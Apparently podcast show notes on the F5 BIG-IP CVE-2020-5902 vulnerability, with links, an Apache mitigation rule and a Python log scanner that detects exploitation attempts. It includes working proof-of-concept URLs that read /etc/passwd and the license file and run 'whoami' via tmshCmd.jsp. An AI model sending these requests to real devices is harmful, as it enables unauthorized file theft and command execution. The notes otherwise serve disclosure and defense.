
Jul 8, 2020

1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber

#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537

F5 vulnerability:

https://www.wired.com/story/f5-big-ip-networking-vulnerability/

https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/


F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258

Apache httpd config that answers 404 to any request whose path contains a semicolon (the character the PoC path traversal relies on):

    <LocationMatch ";">
        Redirect 404 /
    </LocationMatch>


https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE

F5 Big-IP CVE-2020-5902 LFI and RCE

LFI

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

or /etc/hosts

or /config/bigip.license

RCE

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
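Detection example, added here and not part of the original notes or any F5/NCC Group tooling: a small Python scanner that reads Apache combined-format access log lines and flags requests that carry the `..;` traversal segment or hit the fileRead.jsp / tmshCmd.jsp endpoints named above. The log lines, IP addresses (203.0.113.0/24 documentation range) and timestamps are constructed for the example; the regexes and severity labels are my own choices, not an official signature. Targets are URL-decoded before matching, so a percent-encoded semicolon (`..%3b`) is caught as well.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format (not from a real device).
SAMPLE_LOG = """\
203.0.113.10 - - [08/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [08/Jul/2020:10:00:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1044 "-" "curl/7.68.0"
203.0.113.12 - - [08/Jul/2020:10:00:09 +0000] "GET /tmui/login.jsp/..%3b/tmui/locallb/workspace/tmshCmd.jsp?command=whoami HTTP/1.1" 404 0 "-" "python-requests/2.24"
203.0.113.13 - - [08/Jul/2020:10:00:12 +0000] "GET /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 401 0 "-" "curl/7.68.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The traversal token from the public PoC, matched after URL-decoding.
TRAVERSAL_RE = re.compile(r'/\.\.;/')

# TMUI endpoints used in the public PoC for file read and tmsh command execution.
SENSITIVE_ENDPOINTS = (
    "/tmui/locallb/workspace/fileRead.jsp",
    "/tmui/locallb/workspace/tmshCmd.jsp",
)


def classify_request(target):
    """Return the reasons a request target looks like a CVE-2020-5902 attempt (empty list if none)."""
    decoded = unquote(target)          # normalise %2e%2e%3b and friends before matching
    path = urlsplit(decoded).path      # urlsplit keeps ';' inside the path (urlparse would not)
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("..; path traversal")
    if any(path.endswith(ep) for ep in SENSITIVE_ENDPOINTS):
        reasons.append("sensitive TMUI workspace endpoint")
    return reasons


def scan_log(text):
    """Parse log text and return one finding per suspicious request.

    A 404 (e.g. from the LocationMatch mitigation) or 401 still counts: the attempt
    happened, the status only tells you whether it was blocked.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if not reasons:
            continue
        severity = "high" if "..; path traversal" in reasons else "medium"
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "target": m["target"],
            "status": int(m["status"]),
            "severity": severity,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["status"], f["target"], "|", ", ".join(f["reasons"]))
```

Direct hits on the workspace endpoints without the traversal segment are only "medium" because an authenticated administrator can legitimately reach them; the `..;` segment has no legitimate use and is the high-confidence signal.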

How to cope in a no-win situation:

https://twitter.com/datSecuritychic/status/1280527467569008640

F5 PoC vuln tweet

Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.